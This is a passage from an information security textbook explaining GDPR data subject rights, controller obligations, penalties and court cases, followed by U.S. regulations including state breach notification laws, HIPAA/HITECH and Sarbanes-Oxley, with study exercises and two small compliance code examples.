National regulation is extremely important to adhere to: Politico reported that GDPR regulatory fines have climbed to €746 million [1], and often the most serious financial impact of a breach is in customer churn [2]. This book's second edition broadens its reach as a more international version. While national regulation has been relegated to later chapters of the book, that should not reflect a lack of importance. Chapters are provided on the European Union's General Data Protection Regulation, American security regulation, and the U.S. HIPAA/HITECH regulation, which is the focus of the Health First Case Study. Some nations, including India, require adherence to the International Organization for Standardization's standards (ISO/IEC 27001-2) [3]. Furthermore, as the world has become smaller and smaller through international trade, travel and, in particular, the Internet's web, it is useful, if not absolutely necessary, to understand regulations not only in your home country, but also in the nations your organization does business with.

The final chapter in this section is on ethical risk. As our world has become more driven by technology, changes can now be deployed worldwide, nearly overnight, with minimal chance for regulation or corrections to adapt. Therefore, it becomes extremely important for technologists to step up, speak up, and evaluate ethical risk as part of their regular job duties.

References

1. Manancourt V (2022) Instagram fined €405M for violating kids' privacy. Politico, September 5, 2022
2. IBM (2021) Cost of a data breach report 2021. IBM
3. Johnson J, Lincke SJ, Imhof R, Lim C (2014) A comparison of international information security regulation. Interdisciplin J Inf Know Manag, Informing Science Institute, 9:89–116

Chapter 17

Complying with the European Union General Data Protection Regulation (GDPR)

It is critical that controllers assess their level of transparency from the standpoint of complying with data subjects' needs, rather than from the perspective of how well it serves the controller's business. Emily Jones, Data Privacy Lawyer and Partner, Osborne Clarke LLP [1, pp. 51–57]

Europe has a common overarching regulation that focuses on data privacy and is exemplary in the rights it affords its constituents. This chapter considers aspects such as the rights afforded to data subjects, recommendations for adherence, and the impacts of ignoring the regulation. GDPR applies not only to all European Union member states, but also to non-EU nations in the European Economic Area (EEA) who choose to be GDPR adherent – and it also applies to all organizations that do business in these nations [2]. Readers are encouraged to first read the chapter on Information Privacy, which discusses some aspects of GDPR.

17.1 Background

GDPR replaced Europe's Data Protection Directive (DPD) of 1995, which was seen as not adequately protecting citizens as technology advanced. Secondly, Article 8 of the E.U. Charter of Fundamental Rights recognizes the right to data protection, and GDPR is meant to address this right as part of the E.U. value of the right to privacy. Thirdly, the DPD was inconsistently applied across Europe, and a more 'harmonious' regulation was needed. Fourthly, the DPD did not provide sufficient incentive for organizations to comply, so fines were enlarged in GDPR.

The GDPR took effect in May 2018 for all E.U. states and the EEA countries that chose to join, including Iceland, Norway and Liechtenstein [2]. The U.K. discontinued GDPR in 2020. In its first year, over 144,000 individual complaints were received and over 89,000 data breach notifications were reported [2]. However, GDPR needed a ramp-up period, as GDPR administrative organizations became more adept at addressing cases, and businesses required warning time to come into compliance. Although the average fine in 2019 was €11,380 [2], by 2022 Politico [3] had reported huge penalties: Amazon €746 million, Instagram €405 million, WhatsApp €225 million, and Facebook €17 million.

17.2 Applicability

The GDPR begins by stating its purpose: "This Regulation protects fundamental rights and freedoms of natural persons and in particular their right to the protection of personal data" (Article 1). However, it clarifies that it applies regardless of the degree of computerization of the data: to wholly 'automated processing', partial processing, or any variety of noncomputerized access. It applies to all activities within the European Union, whether or not a fee is paid, and regardless of whether the processing occurs in the E.U. This means that foreign companies doing business or monitoring persons in the E.U. must adhere to GDPR, regardless of where the data is stored or processed.

17.3 General Requirements

GDPR penalties can range from warnings, to fines of €20 million (approx. $20 million) or 4% of annual revenue, whichever is higher, to shutting down processing [2]. This description of GDPR is a simplified overview, intended to improve readability and understandability; the source of the regulation, at https://gdpr-info.eu, is the best source for finer details.

17.4 Rights Afforded to Data Subjects

There are seven official data subject rights that are important components of GDPR, and three rights related to remedies. They are summarized in this section [4]. There also appear to be some additional privileges that the GDPR does not call a 'right', but that appear to be rights nonetheless. These we call 'privileges', and they are included at the end of this section.

Many rights articles repeat concepts. To avoid repetition and simplify this description, these concerns are briefly summarized here, with their main article source:

• Supervisory authorities: These data protection authorities are organization(s) assigned by member nations to process complaints and breaches, investigate cases, advise on and promote data privacy, enforce penalties, and work with other supervisory authorities to apply GDPR in a consistent way across member nations (Article 54) [2].
• Child's consent: Controllers can retain information on data subjects when they are 16 or older. If they are younger than 16, parental consent is required (Article 8).
• Conflicting laws: The European Union consists of member states. Member state regulation or other E.U. regulation may modify GDPR (Article 6). Examples include whether warnings may be issued for the first GDPR violation, and the ages of children who need parental approval [2].
• International transparency: Any sending of personal data to international organizations or foreign countries shall be made known to the data subject; these international organizations are equally responsible and accountable for all aspects of GDPR (Article 3, Chap. 5).
• Public interest: There are cases when data subject rights do not apply, including for reasons of public interest, such as public health, legal proceedings, or needs of "public interest, scientific or historical research purposes or statistical purposes" (Article 17), including archival. The section that limits rights (Article 23) is summarized later in the chapter.

17.4.1 Right of Access by the Data Subject (Article 15)

The data subject shall have the right to learn whether their personal data is being processed, and if so, to access information relating to their personal data, including:

• the purposes of the processing;
• the categories of personal data collected and the source of that information;
• the recipient group(s) who will receive the personal data (including international organizations/countries);
• the expected period for which the personal data will be retained, or, if not possible, the criteria used to determine that period;
• the right to request rectification or erasure of personal data, or restriction of processing of personal data concerning the data subject;
• the right to lodge a complaint with a supervisory authority;
• the existence of and logic for automated decision-making (including profiling) and its significance and impact.

17.4.2 Right to Rectification (Article 16)

The data subject shall have the right to obtain from the controller, without undue delay, the rectification of inaccurate personal data, including:

• the right to have incomplete personal data completed, including by means of a supplementary statement.


17.4.3 Right to Erasure ('Right to Be Forgotten') (Article 17)

The data subject shall have the right to the erasure of personal data without undue delay if any of the following apply:

• the personal data are no longer necessary in relation to the original purposes;
• the data subject withdraws consent or objects to the processing (assuming no overriding legitimate grounds);
• the personal data have been unlawfully processed or must be erased for compliance with a legal obligation.

When the personal data is public, the controller shall take reasonable steps to inform third-party processors that the data subject has requested the erasure. The above shall not apply when inconsistent with:

• the right of freedom of expression and information;
• reasons of legal obligation, public health or other public interest.

17.4.4 Right to Restriction of Processing (Article 18)

The data subject has the right to obtain restriction of processing when:

• the data subject contests the accuracy of their personal data or the legitimacy of processing, until the accuracy is verified or the issue is resolved;
• the processing is unlawful, but the data subject opposes the erasure of their data and instead requests restricting processing.

If any of the above apply, personal data shall only be processed:

• with the data subject's consent; or
• for legal claims or public interest; or
• for the protection of another person's rights.

The controller shall inform the data subject before resuming processing.

17.4.5 Right to Data Portability (Article 20)

The data subject shall have the right to:

• receive his/her personal data, which he/she provided to a controller, in a structured, commonly used and machine-readable format;
• transmit their data to another controller, when the processing is automated and based on consent;


• have personal data transmitted directly from one controller to another, where technically feasible.

This right shall not adversely affect the rights and freedoms of others.

17.4.6 Right to Object to Processing (Article 21)

The data subject shall have the right to object to processing of his/her personal data:

• when the processing relates to direct marketing and/or profiling;
• except when the processing is necessary for reasons of public interest;
• except when the controller demonstrates legitimate grounds for continuing processing, such as legal or other issues overriding the interests of the data subject.

The controller shall communicate this right clearly and separately from other communications, by the time of the first communication with the data subject.

17.4.7 Right to Not Be Subject to a Decision Based Solely on Automated Processing (Article 22)

The data subject shall have the right to not be evaluated based solely on automated processing (including profiling), when such processing causes a significant or legal impact to them. Exceptions include: when the data subject consents or enters a contract with a controller; or when the nation (or union) approves specific conditions, which include safeguards.

17.4.8 Rights of Remedies, Liabilities and Penalties (Articles 77–79)

Three additional rights are allocated to data subjects, as specified in a later section of GDPR, related to GDPR violations against them:

• Right to lodge a complaint with a supervisory authority (Article 77).
• Right to an effective judicial remedy against a supervisory authority: the data subject can appeal non-action to a court of the nation's law (Article 78).
• Right to an effective judicial remedy against a controller or processor: the data subject can appeal controller or processor wrong-doing violating GDPR law to a court of the nation's law (Article 79).


17.4.9 Privilege of Notification (Articles 13, 14)

When a controller collects information about a data subject, the controller must disclose: the controller's identity and contact information; the purpose, legal justification and/or legitimate interests for processing the information; a description of third parties who may receive the information; and whether the information will be retained or processed in a foreign country, and if so, assurances of sufficient controls to safeguard its protection. Data subjects shall also be told upon sign-up (when providing their information):

• the impact or options if the subject does not provide the requested information (e.g., as a contract requirement);
• any impact of the processing that will occur, including any profiling, related to sign-up;
• data subject rights (e.g., rights of rectification, erasure, data portability);
• the data subject's right to withdraw consent and lodge a complaint;
• how long their data will be held, or the criteria for determining that.

When information is obtained without the data subject's cooperation, the above list still applies, with the addition of the following notification items: the types of information collected about the subject, and where that information came from. The subject must be notified within 1 month, or by the first communication with the subject, or before the information is provided to another organization. Controllers do not need to notify data subjects when there are valid reasons for professional secrecy or when investigating violations of other national or union laws. If the controller decides to change their purpose for processing, data subjects must be informed in advance.

17.4.10 Privilege of Communicated Response (Article 12)

When a data subject requests copies of their information, changes in processing, or corrections related to any of their rights, the controller shall respond within 1 month. They may respond with a reason for delay and then answer the request within an additional 2 months. This response shall be given at no charge to the data subject, unless requests are repetitive, in which case the organization may charge a fee or refuse the requests. If the controller suspects the petitioner's identity is fraudulent, they may request additional information (Article 12).

17.4.11 Privilege of Protection of Special Groups (Articles 9, 10)

It is prohibited to reveal personal data related to: "racial or ethnic origin, political opinions, religious or philosophical beliefs, or trade union membership, and the processing of genetic data, biometric data for the purpose of uniquely identifying a natural person, data concerning health or data concerning a natural person's sex life or sexual orientation" (Article 9). There are a number of exceptions to this prohibition, in particular to understand the needs of and protect special groups. Thus, such processing is permitted when consent is given, or for legal, health or other public interest reasons. Similarly, criminal convictions may only be processed under the authority of the E.U. or member governments, in order to protect data subject rights (Article 10).

17.5 Restrictions to Rights (Article 23)

The above rights are important to protect the fundamental rights of data subjects, but controllers may restrict rights as a 'necessary and proportional measure' to safeguard:

• national security, defense, or public security;
• the prevention, investigation, or prosecution of criminal offences, the execution of criminal penalties, or the safeguarding of public security;
• economic, health or other major objectives of general public interest;
• the protection of judicial independence and proceedings;
• the prevention, investigation, and prosecution of breaches of ethics for regulated professions;
• the protection of the data subject or the rights and freedoms of others;
• the enforcement of civil law claims.

17.6 Controller Processing Requirements

To comply with GDPR, controllers must meet additional processing requirements, which are described in this section.

17.6.1 Risk Management and Security

Security must be addressed. Security issues include confidentiality, integrity, availability and resilience (Article 32). Controls provided as examples or described in GDPR include data minimization, purpose limitation, encryption and pseudonymization, regular testing for vulnerabilities, business continuity and incident response.

A Data Privacy Impact Assessment (DPIA) must be completed whenever processing involves personal information, profiling, legal implications, special groups, or publicly accessible information (Article 35). An example DPIA (modified slightly from the GDPR template) is provided in the chapter on Information Privacy. GDPR recommends that controllers survey data subjects about their opinions related to personal risk, and should also check with supervisory authorities, by providing them with DPIA information (Article 36).

Controllers are required to have a qualified data protection officer for government or 'public authority' activities, or any activities regularly monitoring a large number of data subjects or persons in special categories (Articles 37–39). The supervisory authority shall have contact information for this data protection officer, and data subjects shall also be able to contact him or her.
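As one illustration of the Article 32 controls mentioned above, the following is a minimal sketch of pseudonymization: a direct identifier is replaced with a keyed hash, so records remain linkable without exposing identity. The key name and record fields are illustrative assumptions; GDPR expects the additional information needed to re-identify subjects (here, the key) to be kept separately from the pseudonymized data.

```python
# Minimal sketch of pseudonymization (one control GDPR names in Article 32):
# replace a direct identifier with a keyed hash. The key and sample record
# are illustrative; the key must be stored apart from the pseudonymized data.
import hmac
import hashlib

PSEUDONYM_KEY = b"store-this-key-separately"  # placeholder secret

def pseudonymize(identifier: str) -> str:
    return hmac.new(PSEUDONYM_KEY, identifier.encode(), hashlib.sha256).hexdigest()

record = {"subject": pseudonymize("maria.garcia@example.org"), "diagnosis_code": "J45"}
print(record["subject"])  # the same input always maps to the same pseudonym
```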

17.6.2 Breach Notification

Breach notification is required within 72 h of becoming aware of a breach (Article 33). The notification must be made to the supervisory authority, and shall describe, to the best ability of the organization:

• what is known about the type of data breach;
• the estimated number and types of data subjects and records involved;
• contact information for the data protection officer or a helpful contact point;
• the likely consequences of the data breach;
• the measures planned or taken to mitigate the data breach and its negative effects.

Controllers are also required to notify data subjects, providing similar information to the above list in clear language (Article 34). Controllers are absolved of the breach notification if the information could not technically be used by the recipient, e.g., because it was in an encrypted format, or if the controller took sufficient action to ensure any threats to data subjects were immediately remediated. Controllers may notify the public instead of each data subject personally, if this can be done more cost-effectively with similar effect.

17.6.3 Penalties

Organizations are subject to two levels of penalties: a more severe level and a lighter level. Higher penalties are applicable when a privacy principle is broken, data subject rights are violated, an international data transfer or specific member nation provision is violated, or upon command by the supervisory authority. The maximum fine imposed is €20 million or 4% of the organization's total worldwide revenue (Article 83) [2]. Lower-level penalties apply to not meeting GDPR required obligations, and can apply to controllers, processors, a certification body or a monitoring body. The maximum fine imposed is €10 million or 2% of the organization's total worldwide income.

The range of options a supervisory authority may select includes warning or reprimanding an organization; requiring that it send breach notifications; or even shutting down data processing [2]. Some nations have a policy of only issuing a warning for a first offense. Finally, there is a question as to whether these penalties are strong enough to deter organizations whose risk analysis concludes that risking GDPR penalties is more profitable than complying with GDPR, particularly in technology industries [2].

17.6.4 Certification and Adequacy Decisions

GDPR certification is 'voluntary'. Certification is encouraged for controllers and processors, and is meant to be transparent and available to small and large businesses alike. Certification can be obtained for 3 years, and then renewed. Certification can also be withdrawn by the certification agency or a 'competent supervisory authority' (Article 42).

Because doing business with the E.U. is lucrative, it is attractive for overseas organizations to have their nation obtain an adequacy decision concerning GDPR. Such decisions can be based on a region or nation, and reflect commitment to GDPR-required protections (Article 45). The United Kingdom, South Korea, and California in the U.S.A. (due to its CCPA law) have requested adequacy decision status [2].

17.6.5 Management and Third-Party Relationships

Requirements are provided to describe the relationship between joint controllers, or between controllers and processors. Processors are defined as those that perform processing for controllers, whereas controllers define the purposes and means of processing. An important example is that processors (or third-party recipients of PII) must be informed of rectifications to, or deletions of, information, related to the rights to rectification, erasure, and restriction of processing. Data subjects shall be told of these communications if they request it (Article 19).

Actual GDPR court cases have assigned the relationship of joint controllers more commonly than controller-processor [1]. An implication of this is that joint controllers must provide a joint privacy practices notice to specify shared data privacy repercussions. Real cases included organizations who used social media to serve their customers. The organizations were providing their own privacy practices, although the social media platform was collecting personal data with cookies. Courts concluded that such a relationship must be one of joint controllers, so the privacy practices must include statements from both organizations. A similar case involved a website operator who used third-party software as a plug-in. The add-on software was not consistent with the organization's stated privacy practices, and so the courts found a joint controller relationship.


A second management issue relates to a strong policy and training environment. A code of conduct is recommended to help in managing GDPR implementation. Article 40 outlines possible topics for inclusion in the code of conduct policy.

17.7 Actual GDPR Cases

Three notable early cases include Google, fined €50 million, Marriott International at €18.4 million, and British Airways at €20 million [1]. Major data breaches also fall under GDPR, as was the case for Marriott and British Airways; courts decided these breaches violated the security article. A number of cases relate to the issue of joint software, whether organizations using social media platforms or third-party software (see the preceding section, Management and Third-Party Relationships). As an example, Google's €50 million case was found to violate the following requirements:

Transparency and adequate information: Google did not provide all required information in the notice of privacy practices, which requires the identity of the controller, the purposes of and legal basis for the processing, the recipients of the personal data, and other information to ensure fair and transparent processing. Secondly, many organizations write notices of privacy practices (NPPs) to protect themselves, and not to be clear to their users, such as by the use of hierarchical webpages. A French court determined that it is insufficient to put details within a second layer of linked webpages while requesting consent on the top page [1].

Valid consent for ad personalization: One general overall acceptance is inadequate in providing users options. When multiple consent boxes are used, users must check boxes to request processing, not uncheck opt-out boxes [1]. Also, specific consent is required for the implementation of cookies used for personal data collection and targeted advertising. The Greek Data Protection Authority fined an organization €150,000 because it could not prove it had requested consent for a processing activity [1]. An implication is that when businesses add or change services, a full evaluation must be performed, and the privacy practices notification and consent implementation must be updated.

17.8 Questions and Problems

It is recommended to do the Workbook exercises for Information Privacy, since the Workbook exercises are compatible with GDPR.

1. Vocabulary. Match each meaning with the correct word:

Controller, Erasure, Adequacy decision, Data subject, Joint controller, Supervisory authority

(a) An entity about whom data is collected by the organization.
(b) An organization that collects data on entities.
(c) An organization endowed with the responsibility of overseeing GDPR implementation, including processing complaints and issuing judgments.
(d) A nation can import E.U. data since it meets GDPR requirements.
(e) A relationship where two parties must co-write a privacy protection statement.
(f) The right to be forgotten is formally called this right.

2. Legal research. Find a legal case in the news concerning GDPR that is not covered by this chapter. What was the situation, what violations did the court find, what remediations were recommended (if any), and what was the imposed penalty?

3. Notice of Privacy Practices. Find an E.U. organization's Notice of Privacy Practices on the web. What principles and rights does it discuss? How does it request your permission – is it one general permission or one per processing activity? If one per processing activity, what specific permissions does it ask for, and does it provide you options? Are there stated penalties if you do not give your permission?

4. Data Protection Impact Assessment. Complete a DPIA for a case study scenario, as outlined in the Information Privacy chapter's example.

5. Audit. Your business does business in the European Union, with online sales. Prepare an Audit Engagement Plan to ensure that your organization adheres to three of the E.U. rights (your choice). Consider not only verifying documented policy, but also implementation. An example Audit Engagement Plan is provided in Table 15.2.

6. Legal Decision. While financially desperate and 18 years old, a woman sold pictures of herself to a pornography film company in your home country; now, 5 years later, she resides in the E.U. She regrets her decision, because it continues to negatively affect her professional career. She has asked the web distribution company (from whom she never got paid), which does business worldwide, to remove the pages under GDPR. The case is going to trial.

(a) What arguments might lawyers from each side present? Present a summary of their arguments.
(b) What decision should the judge make? Provide written arguments explaining the essential arguments for his or her decision, based on the law.


References

1. Jones E (2020) The GDPR two years on (cover story). Antitrust Magazine 35(1):51–57
2. Hilliard E (2021) The GDPR: a retrospective and prospective look at the first two years. Berkeley Technology Law Review 35:1245–1289
3. Manancourt V (2022) Instagram fined €405M for violating kids' privacy. Politico, September 5, 2022
4. European Union (2018) General data protection regulation GDPR. https://gdpr-info.eu

Chapter 18

Complying with U.S. Security Regulations

Together, let us chart a way forward that secures the life of our nation while preserving the liberties that make our nation worth fighting for. –Pres. Barack Obama, Jan. 17, 2014.

What security regulation(s) must your organization adhere to? What must you implement as part of that regulation? How important is it to adhere to security regulations? This section briefly addresses these issues and explains the implications of non-compliance.

In the United States, news agencies have reported that large companies found to violate security regulation have had to pay millions of dollars to government agencies (often to the Federal Trade Commission or FTC). They are often set up with a special program of remediation and monitoring for an extended period of time (e.g., CVS, ChoicePoint, TJX [3]). These fines and remedial actions are intended to protect individuals from corporations that do not safeguard the security of their customers. Example cases will be described for each regulation. The intention is not to embarrass any particular organization, but rather to illustrate the issues. Many organizations have reported, or will report, intrusions, and it is hoped that any organization that has paid massive fines is now compliant.

To protect customers, patients, and the general public, a number of laws regulate information security in the U.S. This chapter includes three sections: (1) U.S. security-oriented laws organizations must adhere to (e.g., HIPAA); (2) criminal laws that protect organizations (e.g., anti-hacking); and (3) an advanced section on the context of U.S. law.

18.1 Security Laws Affecting U.S. Organizations

This section lays out basic information about each law, including: (1) example cases showing the need; (2) a definition of who needs to be concerned with the law; and (3) the general requirements of the law. From this description, you may learn which law(s) apply to your organization, and what the laws' basic precepts include. Table 18.1 maps various regulations, and the PCI DSS standard, to chapters in this book.


Table 18.1  Chapters required for regulation (R = Required, A = Advisable). Rows are book chapters: 1. Security awareness; 2. Fraud; 4. Risk; 5. Business continuity; 6. Governance (Policy); 7. Information security; 8. Network security; 9. Physical security; 10. Data privacy; 12. Personnel security; 13. Incident response; 14. Metrics; 15. Audit. Per-regulation cell values:

State breach: A A A R R R A R
HIPAA: R A R R R R R R R R R R
SOX: R R R R R R R R R R R R R
GLB: R R R R R R R R R R R A R
Red flag: R R A R R A A R R R A
FISMA: R R R R R R R R R R R R R
PCI DSS and FERPA: A R A A R R R R R R R R A R R A R A R R

This table should help you adhere to applicable laws. Further information on each law is available in the references and on the web, since this general text does not discuss all specific requirements.

18.1.1 State Breach Notification Laws

All 50 states, the District of Columbia, Guam, Puerto Rico and the Virgin Islands have enacted legislation requiring notification of security breaches involving personal information; however, these laws vary by state [5]. The first such law was enacted in California in 2003. It was first enforced in 2005 against ChoicePoint, a data broker that sold credit reports and information about consumers. Law enforcement reported that an identity theft ring potentially took personal information for over 160,000 people [3]. The identity theft ring had pretended to be lawful ChoicePoint customers. ChoicePoint paid $10 million in civil fines to the FTC, $5 million to fund a consumer relief program, and $500,000 to states impacted by the breach, as well as the cost of sending notification letters to over 160,000 people. The ChoicePoint-FTC settlement included ChoicePoint agreeing to create an information security program and incur yearly independent audits until the year 2026. A second case in 2009 resulted in ChoicePoint reevaluating its security plan and reporting to the FTC on its security efforts every 2 months until 2011.

Applicability: This law applies to any organization "… that, for any purpose, handles, collects, disseminates, or otherwise deals with nonpublic personal information" (from the Illinois state breach law [5]). In most states, protected information includes: Social Security number, driver's license number, state identification card number, financial account number or credit or debit card number, "or an account number or credit card number in combination with any required security code, access code, or password that would permit access to an individual's financial account." For some states, including California, Texas, Virginia, Arkansas, and Missouri, private information also includes medical or health insurance information. California law also protects user names and passwords [6]. Private data excludes lawful information made available to the public by local, state, or national government.

General requirements: While each state breach law may differ, this section provides guidelines describing the general intent of the various breach laws. When a breach of private information is determined, the organization must notify the affected persons in plain English in an expedient and timely manner, at no cost to the person. The disclosure may be delayed by law enforcement for an investigation. The disclosure notification shall inform the victims of the breach, including the (estimated) date and nature of the breach and any steps the data collector has taken or plans to take relating to the breach. The disclosure notification may, in addition, be required to include consumer reporting information, such as the toll-free numbers, addresses, and websites of consumer reporting agencies. It may require a statement indicating that these sources can provide help with fraud or security alerts, or other recommended actions. The data collector may need to cooperate with each victim in matters relating to the breach, short of disclosing confidential information or trade secrets. This notification may be provided in written or electronic form. Special conditions may apply, based on state laws.

An affected victim can include an individual or any type of organization. Government agencies are also subject to this law, and often must also report breaches to a higher state agency. State agencies may be required to securely dispose of information when it is no longer needed. In California, New York, and other states, stolen personal information that is encrypted is exempt from disclosure – as long as the encryption key was not also acquired. Texas requires proper information disposal, but it permits encryption: "otherwise modifying the sensitive personal information in the records to make the information unreadable or indecipherable through any means." Personal information shall be disposed of in a way that renders it unreadable, unusable, and undecipherable. Proper disposal methods for paper documents include redaction, burning, pulverizing, or shredding. Disposal methods for electronic and other media include destroying or erasing the media to "prevent the personal information from being further read or reconstructed."

Penalties may apply if an organization fails to report a breach. Fines may range between $10 and $2000 per affected person, with a maximum total penalty of $50,000–$150,000 per breach situation. New York also requires notification to a state agency. Some states may have additional privacy laws. For example, California includes a health privacy law and a consumer report law, as well as separate privacy laws applied to business and government. Texas permits expulsion for students who abuse school computers. To find the privacy laws applicable to a particular state, see the National Conference of State Legislatures (www.ncsl.org/issues-research/telecom/security-breach-notification-laws.aspx) [5].


18.1.2 HIPAA/HITECH Act, 1996, 2009

The Health Insurance Portability & Accountability Act (HIPAA) was passed in 1996. HIPAA initiated a standard for the exchange of electronic health information and regulated the protection of personal health information, within Title II of this comprehensive regulation. This privacy protection is defined in the Privacy Rule, which protects health information whether or not it is computerized, and the Security Rule, which specifically applies to computerized health information. Since the original law lacked sufficient force, the HITECH Act was passed in 2009 to strengthen penalties, protect patients who had been harmed, require breach notification, and ensure compliance by both Covered Entities (CEs: i.e., health care providers and insurance) and their Business Associates (BAs, or contractors) [7].

Background: The release of personal health, addiction, or mental health information can result in social isolation, employment discrimination, and a denial of lifesaving insurance coverage. Example abuses include cases of employment discrimination in hiring, promotion and retention; abuses of privacy resulting in public embarrassment; massive breaches; and avoidance of the use of health insurance when job discrimination could result. See the next chapter on HIPAA for more details [8].

In 2006, CVS pharmacies were caught throwing away unredacted pill bottles, medical instruction sheets, and pharmacy receipts. These contained patient names, addresses, prescription names, physician names, health insurance numbers, and credit card numbers. The FTC and Health and Human Services (HHS) each developed separate remediation plans with CVS that included the development of a security plan, security policies, and an employee training program. The remediation plans also required independent audits and HHS monitoring. CVS paid $2.25 million in fines [3]. In 2009, Blue Cross Blue Shield in Tennessee had 57 hard disks stolen, releasing medical information and Social Security numbers for over one million people. They paid $1.5 million to the Office for Civil Rights, incurred a 3-year remediation plan, and spent $17 million in investigation, notification, and protection expenses [9].

Applicability: Covered Entities (CEs) include health care providers, health plan organizations, and health care clearinghouses. Even organizations that maintain nurses' offices need to be concerned. Business Associates (BAs) include organizations that consult for health care organizations [7]. Thus, HIPAA/HITECH applies widely.

General requirements: The Privacy Rule. The Privacy Rule ensures that health care providers maintain policies regarding patient privacy, including that health information is not to be used for non-health purposes, such as marketing [7, 8]. Workers shall have minimum access to patient information, sufficient only to do their jobs. Privacy safeguards should be reasonable, including privacy curtains, locked cabinets, paper shredders, and clean desk policies. However, privacy requirements are not expected to be extreme, such as private, soundproofed rooms. CEs and BAs must track both allowed and unintended disclosures of patient information. Patients have a right to obtain their own patient information, request corrections, and know who has accessed their health information. Patients should know how their provider handles privacy, via a Notice of Privacy Practices.

The Security Rule. The Security Rule recognizes that Confidentiality, Integrity, and Availability are all important in protecting Electronic Protected Health Information (EPHI) [7, 8]. This regulation is based on risk management, to ensure that security costs correspond with risk. The goal is a regulation that is scalable, technology independent, and comprehensive. The regulation outlines technical, administrative, and physical security requirements, while avoiding specifying detailed technologies that are likely to change with time. Each requirement is defined as Required or Addressable, with Addressable options allowing for documented, alternative, effective implementations.

Briefly, administrative requirements include risk management, alarm/log monitoring, periodic policy review/audit, and personnel management. Personnel requirements include EPHI access granting procedures, supervision of EPHI access, termination procedures, and sanction policies for HIPAA violations. Physical security requirements include a physical security plan, business continuity plans, documented maintenance records, workstation acceptable use plans, and controls for devices and media (describing proper use, repair, disposal, and backup). Technical controls include individual authentication controls, automatic logoff/lockout, encryption and integrity (message digest) controls, and event/transaction logging. Further information is provided in Chap. 19 of this text.
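As one hedged illustration of the technical controls above, the following sketch logs each access to EPHI so that disclosures can be tracked. The field names and log file path are illustrative assumptions, not HIPAA-mandated formats.

```python
# Hedged sketch of a Security Rule technical control: event/transaction
# logging of EPHI access, so allowed and unintended disclosures can be
# tracked. Field names and the log path are illustrative, not mandated.
import json
from datetime import datetime, timezone

def log_ephi_access(user_id: str, patient_id: str, action: str, reason: str) -> None:
    entry = {
        "time": datetime.now(timezone.utc).isoformat(),
        "user": user_id,       # individually authenticated user
        "patient": patient_id,
        "action": action,      # e.g., "view", "update", "print"
        "reason": reason,      # supports minimum-necessary access review
    }
    with open("ephi_access.log", "a") as f:
        f.write(json.dumps(entry) + "\n")

log_ephi_access("nurse42", "MRN-001234", "view", "medication review")
```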

18.1.3 Sarbanes-Oxley Act (SOX), 2002

During the 1990s and early 2000s, a number of corporations were involved in serious and highly publicized accounting fraud [10]. In 2001, Enron was reported to have issued statements misleading regulators and the public, and to have used aggressive accounting techniques in reporting profits. In 2001 and 2002, WorldCom charged ordinary expenses as capital expenses, and reported millions in profit when it should have reported losses. These and other publicized cases resulted in corporate bankruptcies, loss of employee retirement savings in the billions, executive jail time of 15–25 years, and sometimes, restitution fines [3]. Arthur Andersen LLP, an accounting and audit firm, did not follow Generally Accepted Accounting Principles, thereby assisting in the misleading financial reports of WorldCom, Enron, Sunbeam, and Waste Management. This led to the felony conviction of Arthur Andersen in 2002, for obstructing justice [10].

As a result of this fraud, the Sarbanes-Oxley Act was passed in 2002 to protect stockholders, employees, investors, and other stakeholders. Its general purpose is to


address securities fraud, define ethics for reporting finances, increase transparency of financial reporting to stockholders and consumers, ensure disclosure of stock sales to executives, and prohibit loans to top managers.

Applicability: This law applies to publicly traded companies that sell stock on an American stock exchange and must register with the Securities and Exchange Commission (SEC). Therefore, it applies to many international companies, in addition to American companies [3]. Two provisions also apply to not-for-profits. Not-for-profit organizations may consider adherence to additional aspects or the full regulation, in order to gain credibility with donors. Not-for-profits have had their share of major fraud losses, which caused bad publicity. Some states, including New York, California, and New Hampshire, have additional regulation impacting hospitals or nonprofits [11].

General requirements: Requirements for Public, Private, and Nonprofit organizations. Two provisions limit organizational interference in ensuring that fraud can be fully disclosed. These provisions, which apply to all organizations, are the Whistleblower provision and a prohibition against destroying certain documents. The Whistleblower provision requires organizations to establish a means to report financial improprieties and complaints, and prevents the organization from punishing employees who report suspected illegal actions to a judicial proceeding. Any person who destroys, tampers with, or conceals documents that could be evidence in a federal investigation or bankruptcy case is liable for up to a 20-year prison term and/or fines [11]. These policies should be written and well-known, and also apply to electronic records, voicemail, and archives [12]. These provisions are part of SOX Sections 806 and 301. Other recommended provisions for nonprofit organizations include the full Sections 301, 302, and 404, which are described below.

Requirements for Publicly-Traded Companies. Briefly, the full set of sections of Sarbanes-Oxley includes [10]:

• Section 301: Public companies shall establish an audit committee, which hires a registered accounting firm and establishes policies and procedures for handling complaints concerning finances.
• Section 302: Corporate responsibility for financial reports includes a periodic mandated reporting process, where the signing officer testifies to the accuracy and completeness of the audit report, and is responsible for internal controls. The report in addition lists the auditors, audit committee, and significant deficiencies affecting business finances.
• Section 401: Enhanced disclosure in periodic reports includes clarity and better-defined transactions for financial reporting.
• Section 404: Management assessments of internal controls [13]: Auditors must do an audit beyond the traditional financial audit: they must also audit


internal control. Management must provide internal control documentation and perform an assessment of the effectiveness of the organization's internal controls. These controls shall define how significant transactions are processed, how assets are safeguarded, how fraud is controlled, and how end-of-period financial reporting occurs.

Sections 302 and 404 are concerned with reporting the effectiveness of the organization's internal control, and Section 404 impacts information technology and security. COSO, the Committee of Sponsoring Organizations of the Treadway Commission, developed the internal control standards used for Sarbanes-Oxley (SOX) security implementation. COSO defines two areas of control: Process Activity Level and Entity Level controls. Process Activity controls require the documentation of processes and transactions for specific business functional areas, and can be documented as a walkthrough for significant transactions. Entity Level controls include cross-cutting services for many business functional areas, such as IT, personnel, and risk management. COSO then specifies five components: risk assessment, control environment, control activities, information and communication, and monitoring, which are then applied to each of the two areas of Process Activity and Entity Level controls.

